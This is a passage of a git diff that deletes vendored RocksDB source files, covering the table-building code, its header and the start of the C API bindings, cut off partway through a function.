-  const size_t kReportFlushIOStatsEvery = 1048576;
-  Status s;
-  meta->fd.file_size = 0;
-  iter->SeekToFirst();
-  std::unique_ptr<RangeDelAggregator> range_del_agg(
-      new RangeDelAggregator(internal_comparator, snapshots));
-  s = range_del_agg->AddTombstones(std::move(range_del_iter));
-  if (!s.ok()) {
-    // may be non-ok if a range tombstone key is unparsable
-    return s;
-  }
-
-  std::string fname = TableFileName(ioptions.db_paths, meta->fd.GetNumber(),
-                                    meta->fd.GetPathId());
-#ifndef ROCKSDB_LITE
-  EventHelpers::NotifyTableFileCreationStarted(
-      ioptions.listeners, dbname, column_family_name, fname, job_id, reason);
-#endif  // !ROCKSDB_LITE
-  TableProperties tp;
-
-  if (iter->Valid() || range_del_agg->ShouldAddTombstones()) {
-    TableBuilder* builder;
-    unique_ptr<WritableFileWriter> file_writer;
-    {
-      unique_ptr<WritableFile> file;
-#ifndef NDEBUG
-      bool use_direct_writes = env_options.use_direct_writes;
-      TEST_SYNC_POINT_CALLBACK("BuildTable:create_file", &use_direct_writes);
-#endif  // !NDEBUG
-      s = NewWritableFile(env, fname, &file, env_options);
-      if (!s.ok()) {
-        EventHelpers::LogAndNotifyTableFileCreationFinished(
-            event_logger, ioptions.listeners, dbname, column_family_name, fname,
-            job_id, meta->fd, tp, reason, s);
-        return s;
-      }
-      file->SetIOPriority(io_priority);
-
-      file_writer.reset(new WritableFileWriter(std::move(file), env_options,
-                                               ioptions.statistics));
-      builder = NewTableBuilder(
-          ioptions, internal_comparator, int_tbl_prop_collector_factories,
-          column_family_id, column_family_name, file_writer.get(), compression,
-          compression_opts, level, nullptr /* compression_dict */,
-          false /* skip_filters */, creation_time, oldest_key_time);
-    }
-
-    MergeHelper merge(env, internal_comparator.user_comparator(),
-                      ioptions.merge_operator, nullptr, ioptions.info_log,
-                      true /* internal key corruption is not ok */,
-                      snapshots.empty() ? 0 : snapshots.back());
-
-    CompactionIterator c_iter(
-        iter, internal_comparator.user_comparator(), &merge, kMaxSequenceNumber,
-        &snapshots, earliest_write_conflict_snapshot, env,
-        true /* internal key corruption is not ok */, range_del_agg.get());
-    c_iter.SeekToFirst();
-    for (; c_iter.Valid(); c_iter.Next()) {
-      const Slice& key = c_iter.key();
-      const Slice& value = c_iter.value();
-      builder->Add(key, value);
-      meta->UpdateBoundaries(key, c_iter.ikey().sequence);
-
-      // TODO(noetzli): Update stats after flush, too.
-      if (io_priority == Env::IO_HIGH &&
-          IOSTATS(bytes_written) >= kReportFlushIOStatsEvery) {
-        ThreadStatusUtil::SetThreadOperationProperty(
-            ThreadStatus::FLUSH_BYTES_WRITTEN, IOSTATS(bytes_written));
-      }
-    }
-    // nullptr for table_{min,max} so all range tombstones will be flushed
-    range_del_agg->AddToBuilder(builder, nullptr /* lower_bound */,
-                                nullptr /* upper_bound */, meta);
-
-    // Finish and check for builder errors
-    bool empty = builder->NumEntries() == 0;
-    s = c_iter.status();
-    if (!s.ok() || empty) {
-      builder->Abandon();
-    } else {
-      s = builder->Finish();
-    }
-
-    if (s.ok() && !empty) {
-      uint64_t file_size = builder->FileSize();
-      meta->fd.file_size = file_size;
-      meta->marked_for_compaction = builder->NeedCompact();
-      assert(meta->fd.GetFileSize() > 0);
-      tp = builder->GetTableProperties();
-      if (table_properties) {
-        *table_properties = tp;
-      }
-    }
-    delete builder;
-
-    // Finish and check for file errors
-    if (s.ok() && !empty) {
-      StopWatch sw(env, ioptions.statistics, TABLE_SYNC_MICROS);
-      s = file_writer->Sync(ioptions.use_fsync);
-    }
-    if (s.ok() && !empty) {
-      s = file_writer->Close();
-    }
-
-    if (s.ok() && !empty) {
-      // Verify that the table is usable
-      // We set for_compaction to false and don't OptimizeForCompactionTableRead
-      // here because this is a special case after we finish the table building
-      // No matter whether use_direct_io_for_flush_and_compaction is true,
-      // we will regrad this verification as user reads since the goal is
-      // to cache it here for further user reads
-      std::unique_ptr<InternalIterator> it(table_cache->NewIterator(
-          ReadOptions(), env_options, internal_comparator, meta->fd,
-          nullptr /* range_del_agg */, nullptr,
-          (internal_stats == nullptr) ? nullptr
-                                      : internal_stats->GetFileReadHist(0),
-          false /* for_compaction */, nullptr /* arena */,
-          false /* skip_filter */, level));
-      s = it->status();
-      if (s.ok() && paranoid_file_checks) {
-        for (it->SeekToFirst(); it->Valid(); it->Next()) {
-        }
-        s = it->status();
-      }
-    }
-  }
-
-  // Check for input iterator errors
-  if (!iter->status().ok()) {
-    s = iter->status();
-  }
-
-  if (!s.ok() || meta->fd.GetFileSize() == 0) {
-    env->DeleteFile(fname);
-  }
-
-  // Output to event logger and fire events.
-  EventHelpers::LogAndNotifyTableFileCreationFinished(
-      event_logger, ioptions.listeners, dbname, column_family_name, fname,
-      job_id, meta->fd, tp, reason, s);
-
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/builder.h b/thirdparty/rocksdb/db/builder.h
deleted file mode 100644
index 5a5081c..0000000
--- a/thirdparty/rocksdb/db/builder.h
+++ /dev/null
@@ -1,83 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-#include <string>
-#include <utility>
-#include <vector>
-#include "db/table_properties_collector.h"
-#include "options/cf_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/types.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/event_logger.h"
-
-namespace rocksdb {
-
-struct Options;
-struct FileMetaData;
-
-class Env;
-struct EnvOptions;
-class Iterator;
-class TableCache;
-class VersionEdit;
-class TableBuilder;
-class WritableFileWriter;
-class InternalStats;
-class InternalIterator;
-
-// @param column_family_name Name of the column family that is also identified
-//    by column_family_id, or empty string if unknown. It must outlive the
-//    TableBuilder returned by this function.
-// @param compression_dict Data for presetting the compression library's
-//    dictionary, or nullptr.
-TableBuilder* NewTableBuilder(
-    const ImmutableCFOptions& options,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    WritableFileWriter* file, const CompressionType compression_type,
-    const CompressionOptions& compression_opts, int level,
-    const std::string* compression_dict = nullptr,
-    const bool skip_filters = false, const uint64_t creation_time = 0,
-    const uint64_t oldest_key_time = 0);
-
-// Build a Table file from the contents of *iter.  The generated file
-// will be named according to number specified in meta. On success, the rest of
-// *meta will be filled with metadata about the generated table.
-// If no data is present in *iter, meta->file_size will be set to
-// zero, and no Table file will be produced.
-//
-// @param column_family_name Name of the column family that is also identified
-//    by column_family_id, or empty string if unknown.
-extern Status BuildTable(
-    const std::string& dbname, Env* env, const ImmutableCFOptions& options,
-    const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options,
-    TableCache* table_cache, InternalIterator* iter,
-    std::unique_ptr<InternalIterator> range_del_iter, FileMetaData* meta,
-    const InternalKeyComparator& internal_comparator,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, const std::string& column_family_name,
-    std::vector<SequenceNumber> snapshots,
-    SequenceNumber earliest_write_conflict_snapshot,
-    const CompressionType compression,
-    const CompressionOptions& compression_opts, bool paranoid_file_checks,
-    InternalStats* internal_stats, TableFileCreationReason reason,
-    EventLogger* event_logger = nullptr, int job_id = 0,
-    const Env::IOPriority io_priority = Env::IO_HIGH,
-    TableProperties* table_properties = nullptr, int level = -1,
-    const uint64_t creation_time = 0, const uint64_t oldest_key_time = 0);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/c.cc b/thirdparty/rocksdb/db/c.cc
deleted file mode 100644
index cbfb855..0000000
--- a/thirdparty/rocksdb/db/c.cc
+++ /dev/null
@@ -1,3662 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/c.h"
-
-#include <stdlib.h>
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/universal_compaction.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/rate_limiter.h"
-#include "rocksdb/utilities/backupable_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "utilities/merge_operators.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/checkpoint.h"
-
-using rocksdb::BytewiseComparator;
-using rocksdb::Cache;
-using rocksdb::ColumnFamilyDescriptor;
-using rocksdb::ColumnFamilyHandle;
-using rocksdb::ColumnFamilyOptions;
-using rocksdb::CompactionFilter;
-using rocksdb::CompactionFilterFactory;
-using rocksdb::CompactionFilterContext;
-using rocksdb::CompactionOptionsFIFO;
-using rocksdb::Comparator;
-using rocksdb::CompressionType;
-using rocksdb::WALRecoveryMode;
-using rocksdb::DB;
-using rocksdb::DBOptions;
-using rocksdb::DbPath;
-using rocksdb::Env;
-using rocksdb::EnvOptions;
-using rocksdb::InfoLogLevel;
-using rocksdb::FileLock;
-using rocksdb::FilterPolicy;
-using rocksdb::FlushOptions;
-using rocksdb::IngestExternalFileOptions;
-using rocksdb::Iterator;
-using rocksdb::Logger;
-using rocksdb::MergeOperator;
-using rocksdb::MergeOperators;
-using rocksdb::NewBloomFilterPolicy;
-using rocksdb::NewLRUCache;
-using rocksdb::Options;
-using rocksdb::BlockBasedTableOptions;
-using rocksdb::CuckooTableOptions;
-using rocksdb::RandomAccessFile;
-using rocksdb::Range;
-using rocksdb::ReadOptions;
-using rocksdb::SequentialFile;
-using rocksdb::Slice;
-using rocksdb::SliceParts;
-using rocksdb::SliceTransform;
-using rocksdb::Snapshot;
-using rocksdb::SstFileWriter;
-using rocksdb::Status;
-using rocksdb::WritableFile;
-using rocksdb::WriteBatch;
-using rocksdb::WriteBatchWithIndex;
-using rocksdb::WriteOptions;
-using rocksdb::LiveFileMetaData;
-using rocksdb::BackupEngine;
-using rocksdb::BackupableDBOptions;
-using rocksdb::BackupInfo;
-using rocksdb::RestoreOptions;
-using rocksdb::CompactRangeOptions;
-using rocksdb::RateLimiter;
-using rocksdb::NewGenericRateLimiter;
-using rocksdb::PinnableSlice;
-using rocksdb::TransactionDBOptions;
-using rocksdb::TransactionDB;
-using rocksdb::TransactionOptions;
-using rocksdb::OptimisticTransactionDB;
-using rocksdb::OptimisticTransactionOptions;
-using rocksdb::Transaction;
-using rocksdb::Checkpoint;
-
-using std::shared_ptr;
-
-extern "C" {
-
-struct rocksdb_t                 { DB*               rep; };
-struct rocksdb_backup_engine_t   { BackupEngine*     rep; };
-struct rocksdb_backup_engine_info_t { std::vector<BackupInfo> rep; };
-struct rocksdb_restore_options_t { RestoreOptions rep; };
-struct rocksdb_iterator_t        { Iterator*         rep; };
-struct rocksdb_writebatch_t      { WriteBatch        rep; };
-struct rocksdb_writebatch_wi_t   { WriteBatchWithIndex* rep; };
-struct rocksdb_snapshot_t        { const Snapshot*   rep; };
-struct rocksdb_flushoptions_t    { FlushOptions      rep; };
-struct rocksdb_fifo_compaction_options_t { CompactionOptionsFIFO rep; };
-struct rocksdb_readoptions_t {
-   ReadOptions rep;
-   Slice upper_bound; // stack variable to set pointer to in ReadOptions
-};
-struct rocksdb_writeoptions_t    { WriteOptions      rep; };
-struct rocksdb_options_t         { Options           rep; };
-struct rocksdb_compactoptions_t {
-  CompactRangeOptions rep;
-};
-struct rocksdb_block_based_table_options_t  { BlockBasedTableOptions rep; };
-struct rocksdb_cuckoo_table_options_t  { CuckooTableOptions rep; };
-struct rocksdb_seqfile_t         { SequentialFile*   rep; };
-struct rocksdb_randomfile_t      { RandomAccessFile* rep; };
-struct rocksdb_writablefile_t    { WritableFile*     rep; };
-struct rocksdb_filelock_t        { FileLock*         rep; };
-struct rocksdb_logger_t          { shared_ptr<Logger>  rep; };
-struct rocksdb_cache_t           { shared_ptr<Cache>   rep; };
-struct rocksdb_livefiles_t       { std::vector<LiveFileMetaData> rep; };
-struct rocksdb_column_family_handle_t  { ColumnFamilyHandle* rep; };
-struct rocksdb_envoptions_t      { EnvOptions        rep; };
-struct rocksdb_ingestexternalfileoptions_t  { IngestExternalFileOptions rep; };
-struct rocksdb_sstfilewriter_t   { SstFileWriter*    rep; };
-struct rocksdb_ratelimiter_t     { RateLimiter*      rep; };
-struct rocksdb_pinnableslice_t {
-  PinnableSlice rep;
-};
-struct rocksdb_transactiondb_options_t {
-  TransactionDBOptions rep;
-};
-struct rocksdb_transactiondb_t {
-  TransactionDB* rep;
-};
-struct rocksdb_transaction_options_t {
-  TransactionOptions rep;
-};
-struct rocksdb_transaction_t {
-  Transaction* rep;
-};
-struct rocksdb_checkpoint_t {
-  Checkpoint* rep;
-};
-struct rocksdb_optimistictransactiondb_t {
-  OptimisticTransactionDB* rep;
-};
-struct rocksdb_optimistictransaction_options_t {
-  OptimisticTransactionOptions rep;
-};
-
-struct rocksdb_compactionfiltercontext_t {
-  CompactionFilter::Context rep;
-};
-
-struct rocksdb_compactionfilter_t : public CompactionFilter {
-  void* state_;
-  void (*destructor_)(void*);
-  unsigned char (*filter_)(
-      void*,
-      int level,
-      const char* key, size_t key_length,
-      const char* existing_value, size_t value_length,
-      char** new_value, size_t *new_value_length,
-      unsigned char* value_changed);
-  const char* (*name_)(void*);
-  unsigned char ignore_snapshots_;
-
-  virtual ~rocksdb_compactionfilter_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    char* c_new_value = nullptr;
-    size_t new_value_length = 0;
-    unsigned char c_value_changed = 0;
-    unsigned char result = (*filter_)(
-        state_,
-        level,
-        key.data(), key.size(),
-        existing_value.data(), existing_value.size(),
-        &c_new_value, &new_value_length, &c_value_changed);
-    if (c_value_changed) {
-      new_value->assign(c_new_value, new_value_length);
-      *value_changed = true;
-    }
-    return result;
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual bool IgnoreSnapshots() const override { return ignore_snapshots_; }
-};
-
-struct rocksdb_compactionfilterfactory_t : public CompactionFilterFactory {
-  void* state_;
-  void (*destructor_)(void*);
-  rocksdb_compactionfilter_t* (*create_compaction_filter_)(
-      void*, rocksdb_compactionfiltercontext_t* context);
-  const char* (*name_)(void*);
-
-  virtual ~rocksdb_compactionfilterfactory_t() { (*destructor_)(state_); }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    rocksdb_compactionfiltercontext_t ccontext;
-    ccontext.rep = context;
-    CompactionFilter* cf = (*create_compaction_filter_)(state_, &ccontext);
-    return std::unique_ptr<CompactionFilter>(cf);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-};
-
-struct rocksdb_comparator_t : public Comparator {
-  void* state_;
-  void (*destructor_)(void*);
-  int (*compare_)(
-      void*,
-      const char* a, size_t alen,
-      const char* b, size_t blen);
-  const char* (*name_)(void*);
-
-  virtual ~rocksdb_comparator_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return (*compare_)(state_, a.data(), a.size(), b.data(), b.size());
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  // No-ops since the C binding does not support key shortening methods.
-  virtual void FindShortestSeparator(std::string*,
-                                     const Slice&) const override {}
-  virtual void FindShortSuccessor(std::string* key) const override {}
-};
-
-struct rocksdb_filterpolicy_t : public FilterPolicy {
-  void* state_;
-  void (*destructor_)(void*);
-  const char* (*name_)(void*);
-  char* (*create_)(
-      void*,
-      const char* const* key_array, const size_t* key_length_array,
-      int num_keys,
-      size_t* filter_length);
-  unsigned char (*key_match_)(
-      void*,
-      const char* key, size_t length,
-      const char* filter, size_t filter_length);
-  void (*delete_filter_)(
-      void*,
-      const char* filter, size_t filter_length);
-
-  virtual ~rocksdb_filterpolicy_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual void CreateFilter(const Slice* keys, int n,
-                            std::string* dst) const override {
-    std::vector<const char*> key_pointers(n);
-    std::vector<size_t> key_sizes(n);
-    for (int i = 0; i < n; i++) {
-      key_pointers[i] = keys[i].data();
-      key_sizes[i] = keys[i].size();
-    }
-    size_t len;
-    char* filter = (*create_)(state_, &key_pointers[0], &key_sizes[0], n, &len);
-    dst->append(filter, len);
-
-    if (delete_filter_ != nullptr) {
-      (*delete_filter_)(state_, filter, len);
-    } else {
-      free(filter);
-    }
-  }
-
-  virtual bool KeyMayMatch(const Slice& key,
-                           const Slice& filter) const override {
-    return (*key_match_)(state_, key.data(), key.size(),
-                         filter.data(), filter.size());
-  }
-};
-
-struct rocksdb_mergeoperator_t : public MergeOperator {
-  void* state_;
-  void (*destructor_)(void*);
-  const char* (*name_)(void*);
-  char* (*full_merge_)(
-      void*,
-      const char* key, size_t key_length,
-      const char* existing_value, size_t existing_value_length,
-      const char* const* operands_list, const size_t* operands_list_length,
-      int num_operands,
-      unsigned char* success, size_t* new_value_length);
-  char* (*partial_merge_)(void*, const char* key, size_t key_length,
-                          const char* const* operands_list,
-                          const size_t* operands_list_length, int num_operands,
-                          unsigned char* success, size_t* new_value_length);
-  void (*delete_value_)(
-      void*,
-      const char* value, size_t value_length);
-
-  virtual ~rocksdb_mergeoperator_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    size_t n = merge_in.operand_list.size();
-    std::vector<const char*> operand_pointers(n);
-    std::vector<size_t> operand_sizes(n);
-    for (size_t i = 0; i < n; i++) {
-      Slice operand(merge_in.operand_list[i]);
-      operand_pointers[i] = operand.data();
-      operand_sizes[i] = operand.size();
-    }
-
-    const char* existing_value_data = nullptr;
-    size_t existing_value_len = 0;
-    if (merge_in.existing_value != nullptr) {
-      existing_value_data = merge_in.existing_value->data();
-      existing_value_len = merge_in.existing_value->size();
-    }
-
-    unsigned char success;
-    size_t new_value_len;
-    char* tmp_new_value = (*full_merge_)(
-        state_, merge_in.key.data(), merge_in.key.size(), existing_value_data,
-        existing_value_len, &operand_pointers[0], &operand_sizes[0],
-        static_cast<int>(n), &success, &new_value_len);
-    merge_out->new_value.assign(tmp_new_value, new_value_len);
-
-    if (delete_value_ != nullptr) {
-      (*delete_value_)(state_, tmp_new_value, new_value_len);
-    } else {
-      free(tmp_new_value);
-    }
-
-    return success;
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value,
-                                 Logger* logger) const override {
-    size_t operand_count = operand_list.size();
-    std::vector<const char*> operand_pointers(operand_count);
-    std::vector<size_t> operand_sizes(operand_count);
-    for (size_t i = 0; i < operand_count; ++i) {
-      Slice operand(operand_list[i]);
-      operand_pointers[i] = operand.data();
-      operand_sizes[i] = operand.size();
-    }
-
-    unsigned char success;
-    size_t new_value_len;
-    char* tmp_new_value = (*partial_merge_)(
-        state_, key.data(), key.size(), &operand_pointers[0], &operand_sizes[0],
-        static_cast<int>(operand_count), &success, &new_value_len);
-    new_value->assign(tmp_new_value, new_value_len);
-
-    if (delete_value_ != nullptr) {
-      (*delete_value_)(state_, tmp_new_value, new_value_len);
-    } else {
-      free(tmp_new_value);
-    }
-
-    return success;
-  }
-};
-
-struct rocksdb_dbpath_t {
-  DbPath rep;
-};
-
-struct rocksdb_env_t {
-  Env* rep;
-  bool is_default;
-};
-
-struct rocksdb_slicetransform_t : public SliceTransform {
-  void* state_;
-  void (*destructor_)(void*);
-  const char* (*name_)(void*);
-  char* (*transform_)(
-      void*,
-      const char* key, size_t length,
-      size_t* dst_length);
-  unsigned char (*in_domain_)(
-      void*,
-      const char* key, size_t length);
-  unsigned char (*in_range_)(
-      void*,
-      const char* key, size_t length);
-
-  virtual ~rocksdb_slicetransform_t() {
-    (*destructor_)(state_);
-  }
-
-  virtual const char* Name() const override { return (*name_)(state_); }
-
-  virtual Slice Transform(const Slice& src) const override {
-    size_t len;
-    char* dst = (*transform_)(state_, src.data(), src.size(), &len);
-    return Slice(dst, len);
-  }
-
-  virtual bool InDomain(const Slice& src) const override {
-    return (*in_domain_)(state_, src.data(), src.size());
-  }
-
-  virtual bool InRange(const Slice& src) const override {
-    return (*in_range_)(state_, src.data(), src.size());
-  }
-};
-
-struct rocksdb_universal_compaction_options_t {
-  rocksdb::CompactionOptionsUniversal *rep;
-};
-
-static bool SaveError(char** errptr, const Status& s) {
-  assert(errptr != nullptr);
-  if (s.ok()) {
-    return false;
-  } else if (*errptr == nullptr) {
-    *errptr = strdup(s.ToString().c_str());
-  } else {
-    // TODO(sanjay): Merge with existing error?
-    // This is a bug if *errptr is not created by malloc()
-    free(*errptr);
-    *errptr = strdup(s.ToString().c_str());
-  }
-  return true;
-}
-
-static char* CopyString(const std::string& str) {
-  char* result = reinterpret_cast<char*>(malloc(sizeof(char) * str.size()));
-  memcpy(result, str.data(), sizeof(char) * str.size());
-  return result;
-}
-
-rocksdb_t* rocksdb_open(
-    const rocksdb_options_t* options,
-    const char* name,
-    char** errptr) {
-  DB* db;
-  if (SaveError(errptr, DB::Open(options->rep, std::string(name), &db))) {
-    return nullptr;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-rocksdb_t* rocksdb_open_for_read_only(
-    const rocksdb_options_t* options,
-    const char* name,
-    unsigned char error_if_log_file_exist,
-    char** errptr) {
-  DB* db;
-  if (SaveError(errptr, DB::OpenForReadOnly(options->rep, std::string(name), &db, error_if_log_file_exist))) {
-    return nullptr;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-rocksdb_backup_engine_t* rocksdb_backup_engine_open(
-    const rocksdb_options_t* options, const char* path, char** errptr) {
-  BackupEngine* be;
-  if (SaveError(errptr, BackupEngine::Open(options->rep.env,
-                                           BackupableDBOptions(path,
-                                                               nullptr,
-                                                               true,
-                                                               options->rep.info_log.get()),
-                                           &be))) {
-    return nullptr;
-  }
-  rocksdb_backup_engine_t* result = new rocksdb_backup_engine_t;
-  result->rep = be;
-  return result;
-}
-
-void rocksdb_backup_engine_create_new_backup(rocksdb_backup_engine_t* be,
-                                             rocksdb_t* db, char** errptr) {
-  SaveError(errptr, be->rep->CreateNewBackup(db->rep));
-}
-
-void rocksdb_backup_engine_purge_old_backups(rocksdb_backup_engine_t* be,
-                                             uint32_t num_backups_to_keep,
-                                             char** errptr) {
-  SaveError(errptr, be->rep->PurgeOldBackups(num_backups_to_keep));
-}
-
-rocksdb_restore_options_t* rocksdb_restore_options_create() {
-  return new rocksdb_restore_options_t;
-}
-
-void rocksdb_restore_options_destroy(rocksdb_restore_options_t* opt) {
-  delete opt;
-}
-
-void rocksdb_restore_options_set_keep_log_files(rocksdb_restore_options_t* opt,
-                                                int v) {
-  opt->rep.keep_log_files = v;
-}
-
-void rocksdb_backup_engine_restore_db_from_latest_backup(
-    rocksdb_backup_engine_t* be, const char* db_dir, const char* wal_dir,
-    const rocksdb_restore_options_t* restore_options, char** errptr) {
-  SaveError(errptr, be->rep->RestoreDBFromLatestBackup(std::string(db_dir),
-                                                       std::string(wal_dir),
-                                                       restore_options->rep));
-}
-
-const rocksdb_backup_engine_info_t* rocksdb_backup_engine_get_backup_info(
-    rocksdb_backup_engine_t* be) {
-  rocksdb_backup_engine_info_t* result = new rocksdb_backup_engine_info_t;
-  be->rep->GetBackupInfo(&result->rep);
-  return result;
-}
-
-int rocksdb_backup_engine_info_count(const rocksdb_backup_engine_info_t* info) {
-  return static_cast<int>(info->rep.size());
-}
-
-int64_t rocksdb_backup_engine_info_timestamp(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].timestamp;
-}
-
-uint32_t rocksdb_backup_engine_info_backup_id(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].backup_id;
-}
-
-uint64_t rocksdb_backup_engine_info_size(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].size;
-}
-
-uint32_t rocksdb_backup_engine_info_number_files(
-    const rocksdb_backup_engine_info_t* info, int index) {
-  return info->rep[index].number_files;
-}
-
-void rocksdb_backup_engine_info_destroy(
-    const rocksdb_backup_engine_info_t* info) {
-  delete info;
-}
-
-void rocksdb_backup_engine_close(rocksdb_backup_engine_t* be) {
-  delete be->rep;
-  delete be;
-}
-
-rocksdb_checkpoint_t* rocksdb_checkpoint_object_create(rocksdb_t* db,
-                                                       char** errptr) {
-  Checkpoint* checkpoint;
-  if (SaveError(errptr, Checkpoint::Create(db->rep, &checkpoint))) {
-    return nullptr;
-  }
-  rocksdb_checkpoint_t* result = new rocksdb_checkpoint_t;
-  result->rep = checkpoint;
-  return result;
-}
-
-void rocksdb_checkpoint_create(rocksdb_checkpoint_t* checkpoint,
-                               const char* checkpoint_dir,
-                               uint64_t log_size_for_flush, char** errptr) {
-  SaveError(errptr, checkpoint->rep->CreateCheckpoint(
-                        std::string(checkpoint_dir), log_size_for_flush));
-}
-
-void rocksdb_checkpoint_object_destroy(rocksdb_checkpoint_t* checkpoint) {
-  delete checkpoint->rep;
-  delete checkpoint;
-}
-
-void rocksdb_close(rocksdb_t* db) {
-  delete db->rep;
-  delete db;
-}
-
-void rocksdb_options_set_uint64add_merge_operator(rocksdb_options_t* opt) {
-  opt->rep.merge_operator = rocksdb::MergeOperators::CreateUInt64AddOperator();
-}
-
-rocksdb_t* rocksdb_open_column_families(
-    const rocksdb_options_t* db_options,
-    const char* name,
-    int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles,
-    char** errptr) {
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (int i = 0; i < num_column_families; i++) {
-    column_families.push_back(ColumnFamilyDescriptor(
-        std::string(column_family_names[i]),
-        ColumnFamilyOptions(column_family_options[i]->rep)));
-  }
-
-  DB* db;
-  std::vector<ColumnFamilyHandle*> handles;
-  if (SaveError(errptr, DB::Open(DBOptions(db_options->rep),
-          std::string(name), column_families, &handles, &db))) {
-    return nullptr;
-  }
-
-  for (size_t i = 0; i < handles.size(); i++) {
-    rocksdb_column_family_handle_t* c_handle = new rocksdb_column_family_handle_t;
-    c_handle->rep = handles[i];
-    column_family_handles[i] = c_handle;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-rocksdb_t* rocksdb_open_for_read_only_column_families(
-    const rocksdb_options_t* db_options,
-    const char* name,
-    int num_column_families,
-    const char** column_family_names,
-    const rocksdb_options_t** column_family_options,
-    rocksdb_column_family_handle_t** column_family_handles,
-    unsigned char error_if_log_file_exist,
-    char** errptr) {
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (int i = 0; i < num_column_families; i++) {
-    column_families.push_back(ColumnFamilyDescriptor(
-        std::string(column_family_names[i]),
-        ColumnFamilyOptions(column_family_options[i]->rep)));
-  }
-
-  DB* db;
-  std::vector<ColumnFamilyHandle*> handles;
-  if (SaveError(errptr, DB::OpenForReadOnly(DBOptions(db_options->rep),
-          std::string(name), column_families, &handles, &db, error_if_log_file_exist))) {
-    return nullptr;
-  }
-
-  for (size_t i = 0; i < handles.size(); i++) {
-    rocksdb_column_family_handle_t* c_handle = new rocksdb_column_family_handle_t;
-    c_handle->rep = handles[i];
-    column_family_handles[i] = c_handle;
-  }
-  rocksdb_t* result = new rocksdb_t;
-  result->rep = db;
-  return result;
-}
-
-char** rocksdb_list_column_families(
-    const rocksdb_options_t* options,
-    const char* name,
-    size_t* lencfs,
-    char** errptr) {
-  std::vector<std::string> fams;
-  SaveError(errptr,
-      DB::ListColumnFamilies(DBOptions(options->rep),
-        std::string(name), &fams));
-
-  *lencfs = fams.size();
-  char** column_families = static_cast<char**>(malloc(sizeof(char*) * fams.size()));
-  for (size_t i = 0; i < fams.size(); i++) {
-    column_families[i] = strdup(fams[i].c_str());
-  }
-  return column_families;
-}
-
-void rocksdb_list_column_families_destroy(char** list, size_t len) {
-  for (size_t i = 0; i < len; ++i) {
-    free(list[i]);
-  }
-  free(list);
-}
-
-rocksdb_column_family_handle_t* rocksdb_create_column_family(
-    rocksdb_t* db,
-    const rocksdb_options_t* column_family_options,
-    const char* column_family_name,
-    char** errptr) {
